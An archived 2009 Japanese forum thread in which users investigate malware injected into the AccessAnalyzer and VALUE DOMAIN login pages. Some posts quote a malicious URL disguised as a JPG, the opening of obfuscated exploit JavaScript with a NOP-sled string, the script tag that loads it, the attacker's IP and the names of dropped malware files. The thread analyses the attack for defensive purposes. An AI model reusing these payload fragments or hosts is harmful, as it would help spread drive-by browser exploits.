[過去ログ] 【アクセス解析】AccessAnalyzer.com Part5【XREA】 (1001レス)
前次1-
抽出解除 レス栞

このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
390
(5): 2009/04/18(土)09:57 ID:a4dOMSBv(1) AAS
http://www.yumemaboroshi.net/cgi5481/
せっかく良さそうなのになんでRubyなんだよ…orz
うちの鯖Ruby使えないんだよ。なんでPHPで作らないかな…
398
(3): 2009/04/23(木)16:21 ID:??? AAS
i2i
554
(6): 2009/07/08(水)17:21 ID:??? AAS
情報元 2chスレ:hosting

511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー http://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?

514 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:42 0
>>511
省14
563
(4): 2009/07/08(水)18:31 ID:??? AAS
改ざん?されたらしいほうのところを調査

gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな

でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg

一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
省5
574
(3): 2009/07/08(水)19:32 ID:??? AAS
いろいろしらべていくと、あぁなるほど

で、
<script src='go.jpg'></script>
で、問題のjpgをスクリプトとして読み込ませてますね

他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、
これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね

でも、whoisとかで調べていくと、
hellh.netということで、
省5
635
(3): 2009/07/08(水)23:21 ID:??? AAS
VALUE DOMAIN のログインページ改ざん スラッシュドット・ジャパン
http://slashdot.jp/security/article.pl?sid=09/07/08/0432248
638
(3): 2009/07/08(水)23:37 ID:??? AAS
完全に外しちゃったほうがいいのかな?
コードを display:none; で非表示にするだけじゃまずい?
あ、それやったら規約違反になるのか…
682
(3): 2009/07/09(木)01:13 ID:??? AAS
VALUEDOMAINやWIKIWIKI.jpに仕掛けられたスクリプトから呼ばれる
msvidctl.dllスクリプトやswfやpdfがダウンロードし実行するexe。
http://www.virustotal.com/jp/analisis/59c9a0345aae2ee10a0d82fdbae5e87daf12568dfb6e41337283cf08eae63a51-1247059084
× ソースネクスト NOD32
726
(3): 2009/07/09(木)15:02 ID:??? AAS
サポから担当部門に連絡してくれたそうだ。(多分テンプレ)
数日以内には対応してくれるだろう。
747
(4): 2009/07/09(木)19:22 ID:+WiaDvcs(1) AAS
今までの流れがレン鯖スレのVDスレのテンプレにある。
アクアナも同じと見ている。

VALUE DOMAINってどうよ? part34
2chスレ:hosting

公式側のウィルス被害、もう取り繕えないくらい深刻だと思うんだが
相変わらずアナウンスがなんともはや
868
(5): 2009/07/10(金)15:14 ID:??? AAS
一連の騒動、敵のサーバ(110.165.41.103)が繋がらなくなったので
とりあえずこれがあったら感染というファイル名をコピペしておきますね。
windows\system32 の中に
carrsv.dll
diskcheck.exe
flashaegh.dll
mnpse.dll
ntst.dll
871
(3): 2009/07/10(金)15:28 ID:??? AAS
会社のPCを私物化して個人のブログに解析をつけているから
OS入れ直すとか上司に言えない事務員の私・・・。
924
(3): 2009/07/11(土)00:47 ID:??? AAS
解析バナーをクリックしなきゃ大丈夫なんすか?
934
(5): 2009/07/11(土)02:22 ID:??? AAS
実際のところ、ガセネタというか、ログを読むにウイルスに対する過剰反応が多すぎると思う

いろいろわざと感染させたりしてしらべたけど
・Windows XPでアナウンスのあった対応をしていない
・Adobeやその他アプリケーションが最新でない
・セキュリティソフトをインストールしていない。インストールしていても定義データベースが古い

この条件がすべて成り立たないと前と後で変化を観察するかぎり感染はしない様子
またはセキュリティソフトが対策されるまでトロイは抜けていただろうから、レジストリの書き換えまではされていてだろうが、
その次のウイルス本体による汚染まではいかない。ウイルス自体は既知のもの
危険度自体は低い。

でも、感染すると、情報を送信しようとするからネットワークは確かに遅くなるが、気づかないだろう
省5
前次1-
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル

ぬこの手 ぬこTOP 0.042s